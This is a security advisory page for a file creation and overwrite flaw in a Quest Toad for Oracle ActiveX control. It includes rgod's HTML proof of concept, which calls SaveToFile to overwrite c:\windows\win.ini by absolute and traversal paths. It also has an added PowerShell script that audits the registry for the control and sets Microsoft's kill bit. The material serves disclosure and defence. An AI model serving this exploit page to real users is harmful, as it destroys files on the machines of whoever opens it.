Quest Toad For Oracle Explain Plan Display File Creation / Overwrite

2012.04.06
Credit: rgod
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<!--
Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115)
Remote File Creation / Overwrite

vendor site: http://www.quest.com/
file tested: Quest_Toad-Development-Suite-for-Oracle_110R2.exe

CLSID: {F7014877-6F5A-4019-A3B2-74077F2AE126}
Progid: QExplain2.ExplainPlanDisplayX
Binary Path: C:\PROGRA~1\COMMON~1\QUESTS~1\QEXPLA~1.DLL
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True

rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
<!-- The control is marked safe for scripting, so any page that can instantiate it
     may call SaveToFile() and create or overwrite a file at a path it chooses. -->
<object classid='clsid:F7014877-6F5A-4019-A3B2-74077F2AE126' id='obj' width=640 height=480>
</object>
<script>
try{
  obj.SaveToFile("c:\\windows\\win.ini");
}catch(e){ }
try{
  obj.SaveToFile("../../../../../../../../../../windows/win.ini");
}catch(e){ }
</script>
</html>

original url: http://retrogod.altervista.org/9sg_quest_toad_poc.htm
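Defender-side check, added here and not part of rgod's advisory: the PowerShell below audits a Windows host for the CLSID above (is the DLL registered, is Microsoft's ActiveX kill bit already set) and provides a separate function that sets the kill bit, Compatibility Flags 0x400, so Internet Explorer refuses to instantiate the control. The registry paths are Microsoft's standard ActiveX Compatibility and CLSID locations; the function names are this example's own.

```powershell
# Added example, not rgod's code: audit a host for the advisory's control and
# optionally apply Microsoft's ActiveX kill bit so IE refuses to instantiate it.
$VulnClsid = '{F7014877-6F5A-4019-A3B2-74077F2AE126}'   # CLSID from the advisory
function Get-ActiveXKillBitStatus {
    param([Parameter(Mandatory)][string]$Clsid)

    # Check native and WOW64 hives: the control is a 32-bit DLL, so on x64 it lands under Wow6432Node.
    $classKeys = @(
        "HKLM:\SOFTWARE\Classes\CLSID\$Clsid\InprocServer32",
        "HKLM:\SOFTWARE\Classes\Wow6432Node\CLSID\$Clsid\InprocServer32"
    )
    $compatKeys = @(
        "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid",
        "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    )

    # InprocServer32's default value is the path of the registered DLL.
    $binary = $classKeys | Where-Object { Test-Path $_ } |
        ForEach-Object { (Get-ItemProperty $_).'(default)' } | Select-Object -First 1

    # Kill bit = bit 0x400 of the 'Compatibility Flags' DWORD.
    $killBit = $false
    foreach ($k in $compatKeys) {
        if (Test-Path $k) {
            $flags = (Get-ItemProperty $k -ErrorAction SilentlyContinue).'Compatibility Flags'
            if ($flags -and ($flags -band 0x400)) { $killBit = $true }
        }
    }

    [PSCustomObject]@{
        Clsid      = $Clsid
        Registered = [bool]$binary
        BinaryPath = $binary
        KillBitSet = $killBit
        Exposed    = ([bool]$binary) -and (-not $killBit)   # registered and not blocked in IE
    }
}

function Set-ActiveXKillBit {
    param([Parameter(Mandatory)][string]$Clsid)
    # Needs an elevated shell. Creates the compatibility key if absent and ORs in 0x400.
    foreach ($k in @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid",
                     "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid")) {
        if (-not (Test-Path $k)) { New-Item -Path $k -Force | Out-Null }
        $cur = [int]((Get-ItemProperty $k -ErrorAction SilentlyContinue).'Compatibility Flags')
        Set-ItemProperty -Path $k -Name 'Compatibility Flags' -Value ($cur -bor 0x400) -Type DWord
    }
}

Get-ActiveXKillBitStatus -Clsid $VulnClsid | Format-List
```

The kill bit only governs Internet Explorer and hosts that honour the IE compatibility flags; other COM hosts can still load the DLL, so unregistering or removing the control is the fuller fix.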

References:

http://retrogod.altervista.org/9sg_quest_toad_poc.htm



Copyright 2019, cxsecurity.com